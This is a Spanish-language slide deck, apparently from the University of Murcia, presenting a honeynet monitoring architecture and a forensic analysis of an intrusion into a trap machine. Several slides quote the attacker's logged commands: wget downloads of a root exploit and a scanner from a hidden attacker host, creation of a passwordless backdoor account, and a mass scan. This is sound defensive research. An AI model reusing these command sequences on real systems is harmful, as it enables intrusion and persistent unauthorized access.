1 / 30

EVO-HADES: Arquitectura para la monitorización y análisis forense

EVO-HADES: Arquitectura para la monitorización y análisis forense. Jesús Damián Jiménez Re <jdjimenez@dif.um.es> Universidad de Murcia. Contenido. Objetivos Infraestructura de red Monitorización de procesos Análisis de una Intrusión Conclusiones. Contenido. Objetivos

kenton
Download Presentation

EVO-HADES: Arquitectura para la monitorización y análisis forense

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. EVO-HADES: Arquitectura para la monitorización y análisis forense Jesús Damián Jiménez Re <jdjimenez@dif.um.es> Universidad de Murcia

  2. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  3. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  4. 1. Objetivos • Ámbito de actuación: • Evolución del sistema HADES • Proyecto fin de carrera desarrollado en la Universidad de Murcia • En colaboración con el proyecto de máquinas trampa de RedIRIS

  5. 1. Objetivos • Objetivo: • Diseño de una arquitectura de red que permita:

  6. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  7. 2. Infraestructura de red • Basada en los • sistemas HoneyNET • Separación entre: • Subred de control • Subred trampa • Subred corporativa • Máquina de control: • Conectada físicamente a la subred trampa, pero sin interfaz de red en ella • Modo puente • Activado filtrado paquetes (firewall)

  8. 2. Infraestructura de red • Máquina de control • Paquete RPM para la instalación del modo puente + firewall • Configuración del filtrado/captura de equipos trampa mediante ficheros de configuración: # Ejemplo de fichero de configuración de PED-CONTROL # Maquinas cuyo tráfico se desea capturar: 155.54.XX.YY captura # Maquinas cuyo tráfico se desea filtrar: 155.54.ZZ.TT filtra • Inicio y parada del puente+firewall con comandos start/stop. • Comprobación periódica del tamaño de los ficheros de captura  Envío de e-mail de alerta • Filtrado de tráfico para evitar ataques al exterior

  9. 2. Infraestructura de red • Máquinas trampa • Se han habilitado los servicios habituales en una organización: • FTP • telnet • SSH • Servidor Web • Proxy • …

  10. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  11. 3. Monitorización de procesos • Existen ocasiones en las que están implicadas conexiones encriptadas entre el equipo trampa y el atacante • Ejemplo: El atacante instala una versión modificada del servidor OpenSSH (sshd). • No es posible la visualización mediante el análisis del tráfico de la red

  12. 3. Monitorización de procesos • Solución: Modificaciones a nivel del sistema operativo para el envío remoto de: • Procesos/comandos ejecutados • Implantación de un módulo a nivel del kernel de Linux que envía información a la máquina de control

  13. 3. Monitorización de procesos • Módulo para la monitorización • Técnica • Se interceptan las llamadas al sistema provocadas por los procesos • Se ejecuta el código original, más: • El nuevo código, que en nuestro caso envía una trama UDP con el proceso ejecutado • El tráfico generado por el módulo será capturado por la máquina de control, junto al resto del tráfico de la máquina

  14. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  15. 4. Análisis de una intrusión • Objetivos del análisis • Detectar nuevos patrones de ataque y las herramientas utilizadas para ello • Obtener pruebas que justifiquen posibles acciones legales sobre el atacante • Estudio de nuevas herramientas • The Sleuth Kit y Autopsy Forensic Browser

  16. 4. Análisis de una intrusión • Metodología: • Se utiliza la suma de 3 técnicas: • Toda esta información (imágenes + capturas) es pasada a la máquina de análisis para su estudio

  17. 4. Análisis de una intrusión • Descripción de la máquina atacada • Nombre (ficticio): ped.um.es • Linux Red Hat 7.2 • Puesta en red: 29 de Mayo de 2003. • Se descubre que ha sido atacada el día 31 de Mayo del 2003. • Se “permite” el acceso monitorizado a la máquina durante 11 días (hasta el día 10 de Junio de 2003).

  18. 4. Análisis de una intrusión • Se detecta un aumento del tráfico HTTPS • Se recibe un correo electrónico de alerta From: ZZ@control.um.es To: TT@um.es Subject: aumento de 543 K en el trafico de 155.54.XX.YY --------- A las 20:15:00 el equipo de control control.um.es ha detectado un aumento de 543 K en el tráfico con origen o destino la máquina PED 155.54.XX.YY

  19. 4. Análisis de una intrusión • Análisis de tráfico • Se ha aprovechado una vulnerabilidad en la llave del protocolo OpenSSL y el servidor Apache. • Esto permite iniciar un shell con permisos de Apache. • En las conexiones posteriores al tráfico HTTPS, se descubre la descarga de diversos ficheros binarios • Análisis forense: • Se analizan los ficheros descargados: • Exploit pt: Abre un shell con privilegios de root. Se aprovecha de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace (buffer overflow).

  20. 4. Análisis de una intrusión • Análisis del tráfico: • Instalación del rootkit SuckIT en el directorio “/usr/lib/…”: Sat May 31 2003 20:08:01 4096 .a. d/drwxr-xr-x root/user root 145543 /usr/lib/… 65928 ..c -/-rw-r—r-- root/user root 145544 /usr/lib/…/sk.tgz • SuckIT basa su funcionamiento en módulo del núcleo: • Oculta PID’s, ficheros, conexiones tcp/udp/socket raw. • Integra un shell TTY para el acceso remoto.

  21. 4. Análisis de una intrusión • No se registra actividad en la máquina hasta el día 3 de Junio • Análisis de tráfico: • Se sube mediante el servidor web el fichero /tmp/httpd y se ejecuta: Tue Jun 03 2003 21:16:44 21182 ..c -/-rwxr-xr-x apache apache 62724 /tmp/httpd 21182 .a. -/-rwxr-xr-x apache apache 62724 /tmp/httpd .

  22. 4. Análisis de una intrusión • Análisis forense: • /tmp/httpd crea un terminal para la ejecución de comandos, con UID de Apache (48). • Análisis de procesos (módulo): • Para hacerse con permisos de root, el atacante vuelve a descargar el exploit utilizado para el primer ataque (con otro nombre diferente): 21:17:50-2003/06/03 [48:sh:26217:ttyp] cd /tmp 21:18:37-2003/06/03 [48:sh:26217:ttyp] wget direccIPoculta/ozn/abc/prt 21:19:25-2003/06/03 [48:sh:26217:ttyp] chmod +x prt 21:19:27-2003/06/03 [48:sh:26217:ttyp] ./prt • Para asegurarse una entrada posterior al sistema: 21:19:34-2003/06/03 [0:sh:26223:ttyp] /usr/sbin/useradd pwd 21:20:09-2003/06/03 [0:sh:26223:ttyp] passwd –d pwd

  23. 4. Análisis de una intrusión • El atacante instala utilidades para aprovechar la máquina atacada • Análisis forense: • Se instala un proxy IRC llamado psyBNC: • Permite ocultar la IP real a los usuarios del proxy. • Mantiene la conexión a IRC aunque se desconecte el cliente

  24. 4. Análisis de una intrusión • El atacante quiere evitar que otros “atacantes” aprovechen la vulnerabilidad que él ha aprovechado para entrar al sistema • Análisis forense: • Se instala el paquete sslstop.tgz, que contiene dos script: • sslstop: Detieneel soporte SSL para Apache • sslport: Cambia el puerto SSL por defecto de la máquina

  25. 4. Análisis de una intrusión • Desde el día 3 de Junio hasta el día 6 de Junio: • Conexiones de IRC • Las conversaciones han quedado registradas en el tráfico capturado de la máquina atacada • Se han reconstruido algunas con ethereal.

  26. 4. Análisis de una intrusión • Tras mantener la máquina comprometida con éxito 7 días, el atacante considera la máquina “fiable”: • Instalación de herramientas para utilizar esta máquina como puente para el ataque a otras: • Se instala el exploit con el que se atacó a esta máquina (openssl-too-open). • Scanner de puertos

  27. 4. Análisis de una intrusión • Análisis de la información del módulo: • Descarga del exploit openssl-too-open (http.tgz). 03:52:31-2003/06/06 [0:bash:4064:pts] cd /etc 03:52:33-2003/06/06 [0:bash:4064:pts] mkdir .” “ 03:52:34-2003/06/06 [0:bash:4064:pts] cd .” “ 03:52:51-2003/06/06 [0:bash:4064:pts] wget dirIPoculta/valisie/http.tgz • Descarga y ejecución del scanner mass 11:58:08-2003/06/06 [0:bash:4713:pts] wget dirIPoculta/valisie/mass.tgz 11:58:17-2003/06/06 [0:bash:4713:pts] tar xvzf mass.tgz 11:58:20-2003/06/06 [0:bash:4713:pts] cd mass 11:58:22-2003/06/06 [0:bash:4713:pts] ./mass –b 67.0.*.* -s 800 • Los filtros aplicados en la máquina de control hacen que estos escaneos no tengan éxito.

  28. 4. Análisis de una intrusión • El día 10 de Junio se decide que ya se ha obtenido suficiente información del atacante. • Se aplican el filtrado total a través de la máquina de control. • Se apaga la máquina y se desconecta de la red.

  29. Contenido • Objetivos • Infraestructura de red • Monitorización de procesos • Análisis de una Intrusión • Conclusiones

  30. 5. Conclusiones • Se permite la detección de nuevos tipos y herramientas de ataque sin poner en riesgo los equipos actuales de la organización • Con la monitorización de procesos remota: • Es fácil ver lo que está sucediendo en la máquina atacada sin tener que cortar la conexión • Se obtiene información que no sería posible con las otras técnicas • Complementa al análisis forense y análisis del tráfico • Vías futuras: • Migración de la arquitectura para dar soporte a IPv6 • Portar el módulo a otros sistemas operativos • Desarrollo de un sistema de aviso de ataques

More Related